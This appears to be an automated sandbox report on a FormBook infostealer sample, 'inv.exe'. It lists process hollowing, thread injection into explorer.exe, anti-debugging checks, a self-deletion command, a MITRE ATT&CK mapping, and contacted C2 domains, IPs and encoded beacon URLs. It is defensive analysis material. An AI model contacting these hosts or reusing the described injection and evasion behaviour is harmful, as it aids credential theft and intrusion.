          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04805210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0480AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0480AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04823A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04844A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04844A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04894257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0484927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04811B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04811B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0483B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04832397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0482DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0480DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0480F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0480DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04833B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04833B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_0099A55A GetProcessHeap,
          Source: C:\Users\user\Desktop\inv.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00972109 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00971755 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00991BC8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00971F74 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00972109 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 104.164.35.80 80
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe | Network Connect: 173.192.101.248 80
          Source: C:\Windows\explorer.exe | Network Connect: 81.88.57.68 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 192.185.199.129 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\inv.exe | Section loaded: unknown target: C:\Users\user\Desktop\inv.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\inv.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\inv.exe | Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\inv.exe | Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\inv.exe | Thread register set: target process: 3292
          Source: C:\Windows\SysWOW64\systray.exe | Thread register set: target process: 3292
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\inv.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\inv.exe | Section unmapped: C:\Windows\SysWOW64\systray.exe base address: F00000
          Source: C:\Users\user\Desktop\inv.exe | Process created: C:\Users\user\Desktop\inv.exe C:\Users\user\Desktop\inv.exe
          Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\inv.exe'
          Source: explorer.exe, 00000003.00000000.248446236.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmp | Binary or memory string: uProgram Manager
          Source: explorer.exe, 00000003.00000000.260039044.0000000005F40000.00000004.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.248446236.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.1314890488.0000000000EB8000.00000004.00000020.sdmp | Binary or memory string: ProgmanX
          Source: explorer.exe, 00000003.00000000.248446236.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.263820453.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_0097221B cpuid
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00971E43 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API1 | Path Interception | Process Injection512 | Rootkit1 | Credential API Hooking1 | System Time Discovery1 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion2 | LSASS Memory | Security Software Discovery141 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection512 | Security Account Manager | Virtualization/Sandbox Evasion2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information3 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing1 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery122 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 323024 | Sample: inv.exe | Startdate: 26/11/2020 | Architecture: WINDOWS | Score: 100

          Start
            DNS/IP: g.msn.com
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 4 other signatures
            started inv.exe
              Signatures: Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              started inv.exe
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                injected explorer.exe
                  DNS/IP: chartershome.com 192.185.199.129, 49767, 80 UNIFIEDLAYER-AS-1US United States; mycapecoralhomevalue.com 173.192.101.248, 49758, 49779, 80 SOFTLAYERUS United States; 25 other IPs or domains
                  Signatures: System process connects to network (likely due to code injection or exploit)
                  started systray.exe
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    started cmd.exe
                      started conhost.exe
              started conhost.exe

          Screenshots

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          inv.exe | 43% | Virustotal |
          inv.exe | 68% | ReversingLabs | Win32.Trojan.FormBook
          inv.exe | 100% | Avira | HEUR/AGEN.1138958
          inv.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.2.inv.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.inv.exe.970000.0.unpack | 100% | Avira | HEUR/AGEN.1138958
          0.0.inv.exe.970000.0.unpack | 100% | Avira | HEUR/AGEN.1138958
          2.2.inv.exe.970000.1.unpack | 100% | Avira | HEUR/AGEN.1138958
          2.0.inv.exe.970000.0.unpack | 100% | Avira | HEUR/AGEN.1138958

          Domains

          Source | Detection | Scanner | Label
          cfmfair.com | 0% | Virustotal |
          multitask-improvements.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.nextgenmemorabilia.com/hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.nairobi-paris.com/hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4 | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.azery.site/hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.multitask-improvements.com/hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== | 0% | Avira URL Cloud | safe
          http://www.affiliateclubindia.com/hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.cfmfair.com/hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB4 | 0% | Avira URL Cloud | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.fittcycleacademy.com/hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 | 0% | Avira URL Cloud | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.skinnerttc.com/hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB4 | 0% | Avira URL Cloud | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.nationshiphop.com/hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          skinnerttc.com | 34.102.136.180 | true | true | | unknown
          cfmfair.com | 104.164.35.80 | true | true | | unknown
          multitask-improvements.com | 34.102.136.180 | true | true | | unknown
          affiliateclubindia.com | 34.102.136.180 | true | true | | unknown
          chartershome.com | 192.185.199.129 | true | true | | unknown
          onstatic-fr.setupdns.net | 81.88.57.68 | true | true | | unknown
          fittcycleacademy.com | 34.102.136.180 | true | true | | unknown
          shops.myshopify.com | 23.227.38.74 | true | true | | unknown
          nationshiphop.com | 34.102.136.180 | true | true | | unknown
          mycapecoralhomevalue.com | 173.192.101.248 | true | true | | unknown
          nextgenmemorabilia.com | 34.102.136.180 | true | true | | unknown
          bitcoincandy.xyz | 184.168.131.241 | true | true | | unknown
          www.chartershome.com | unknown | unknown | true | | unknown
          www.affiliateclubindia.com | unknown | unknown | true | | unknown
          www.skinnerttc.com | unknown | unknown | true | | unknown
          www.nationshiphop.com | unknown | unknown | true | | unknown
          www.bitcoincandy.xyz | unknown | unknown | true | | unknown
          www.azery.site | unknown | unknown | true | | unknown
          www.cfmfair.com | unknown | unknown | true | | unknown
          www.nextgenmemorabilia.com | unknown | unknown | true | | unknown
          www.mycapecoralhomevalue.com | unknown | unknown | true | | unknown
          g.msn.com | unknown | unknown | false | | high
          www.fittcycleacademy.com | unknown | unknown | true | | unknown
          www.jacmkt.com | unknown | unknown | true | | unknown
          www.multitask-improvements.com | unknown | unknown | true | | unknown
          www.best20banks.com | unknown | unknown | true | | unknown
          www.goodberryjuice.com | unknown | unknown | true | | unknown
          www.nairobi-paris.com | unknown | unknown | true | | unknown

                                                              Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.nextgenmemorabilia.com/hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 | true | Avira URL Cloud: safe | unknown
          http://www.nairobi-paris.com/hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4 | true | Avira URL Cloud: safe | unknown
          http://www.azery.site/hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== | true | Avira URL Cloud: safe | unknown
          http://www.multitask-improvements.com/hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== | true | Avira URL Cloud: safe | unknown
          http://www.affiliateclubindia.com/hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== | true | Avira URL Cloud: safe | unknown
          http://www.cfmfair.com/hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB4 | true | Avira URL Cloud: safe | unknown
          http://www.fittcycleacademy.com/hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 | true | Avira URL Cloud: safe | unknown
          http://www.skinnerttc.com/hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB4 | true | Avira URL Cloud: safe | unknown
          http://www.nationshiphop.com/hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== | true | Avira URL Cloud: safe | unknown

                                                              URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.autoitscript.com/autoit3/J | explorer.exe, 00000003.00000000.260102956.0000000006840000.00000004.00000001.sdmp | false | | high
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | false | | high
                                                                          http://www.tiro.comexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.goodfont.co.krexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.carterandcone.comlexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
